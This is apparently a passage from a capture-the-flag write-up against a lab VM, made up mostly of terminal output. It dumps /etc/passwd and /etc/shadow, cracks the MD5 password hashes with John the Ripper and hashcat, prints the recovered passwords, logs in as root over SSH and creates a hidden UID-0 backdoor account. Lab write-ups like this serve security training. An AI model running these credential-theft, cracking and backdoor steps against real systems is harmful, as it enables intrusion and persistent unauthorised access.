openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPCService User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrentSeed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQLServer:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAPServer:/var/lib/imap:/bin/bash


bash-3.2# cat shadowroot:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::

bash-3.2# cd/homebash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issueFedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-releaseFedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1 Link encap:Ethernet HWaddr08:00:27:C3:02:2B
inetaddr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20857470 (19.8 MiB) TX bytes:91664318 (87.4 MiB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inetaddr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACKRUNNING MTU:16436 Metric:1
RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:239589 (233.9 KiB) TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomainlocalhostlocalhost
::1 localhost6.localdomain6 localhost6


Lets crack the password now: 

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer- johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root using John seems tedious, lets use hashcatfor this purpose and try..

root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcatwill expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcatv0.49 with 1 threads and 32mbsegment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015

So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost~]# whoami
root
[root@localhost~]# 


Creating a backdooruser with root privileges :bash-3.2# useradd-ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd|grepjohn
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passed johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing user :
root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost~]#